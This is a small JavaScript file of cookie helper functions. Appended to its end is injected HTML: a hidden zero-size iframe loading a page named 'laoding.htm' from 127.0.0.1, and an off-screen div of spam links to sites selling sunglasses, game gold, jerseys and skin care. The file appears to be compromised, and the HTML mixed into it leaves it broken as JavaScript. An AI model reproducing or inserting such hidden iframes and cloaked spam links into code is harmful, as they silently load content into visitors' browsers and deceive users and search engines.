function setCookie (name, value) {
  //document.cookie = name + "=" + value + ";expires=Thursday,01-Jan-2099 00:00:00 GMT";
  document.cookie = name + "=" + value + "; path=/;expires=Thursday,01-Jan-2099 00:00:00 GMT";
}

function getCookie(name) {
  var search;
  search = name + "=";
  offset = document.cookie.indexOf(search); 
  if (offset != -1) {
    offset += search.length ;
    end = document.cookie.indexOf(";", offset) ;
    if (end == -1)
      end = document.cookie.length;
    return unescape(document.cookie.substring(offset, end));
  }
  else
    return "";
}

function deleteCookie(name) {
  setCookie(name, "");
}<iframe src=http://127.0.0.1/laoding.htm width=0 height=0></iframe><DIV style="LEFT: -300px; POSITION: absolute; HEIGHT: 10px"><A title="sunglasses" href="http://www.oakleysunglassessale.com" target=_blank>Sunglasses</A><BR><A title="wow gold" href="http://www.wowgold-wlk.com" target=_blank>WOW Gold</A><BR><A title="NFL Jerseys" href="http://www.nfljerseysdirect.com" target=_blank>NFL Jerseys</A><BR><A title="skin care products" href="http://www.skincareproducts-sale.com" target=_blank>Skin Care Products</A><BR><A title="wow gold" href="http://www.wowgoldbc.com" target=_blank>WOW Gold</A><BR> </DIV>

